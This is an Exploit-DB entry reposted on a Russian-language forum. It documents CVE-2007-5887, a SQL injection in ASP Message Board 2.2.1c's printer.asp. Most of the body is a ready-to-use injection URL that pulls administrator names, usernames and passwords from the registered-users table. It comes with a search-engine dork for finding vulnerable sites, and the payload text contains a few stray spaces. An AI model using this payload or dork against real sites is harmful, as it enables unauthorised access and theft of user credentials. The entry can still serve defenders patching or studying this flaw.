- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 4609
- Проверка EDB
-
- Пройдено
- Автор
- Q7X
- Тип уязвимости
- WEBAPPS
- Платформа
- ASP
- CVE
- cve-2007-5887
- Дата публикации
- 2007-11-05
Код:
* Bug Found On : "ASP Message Board"
*
* Found By : Q7x
*
* Home : Www.Larestankids.coM ( Ashiyane2 Security Team )
*
* Dork : inurl:"printer.asp?forum="
*
* Version : 2.2.1c
*
* Bug : ASP Message Board - printer.asp - Remote Sql Injection Exploit
*
* Exploit : Admin User / Password : http://www.site.com/boards/printer.asp?forum=AMB_xxxx&id=xxxx or 1=convert(int,(select top 1 convert(varchar,isnull(convert(varchar,Admin),'NUL L'))%2b'/'%2bconvert(varchar,isnull(convert(varcha r,Password),'NULL'))%2b'/'%2bconvert(varchar,isnul l(convert(varchar,Username),'NULL')) from AMB_REGISTEREDUSERS))
# milw0rm.com [2007-11-05]- Источник
- www.exploit-db.com
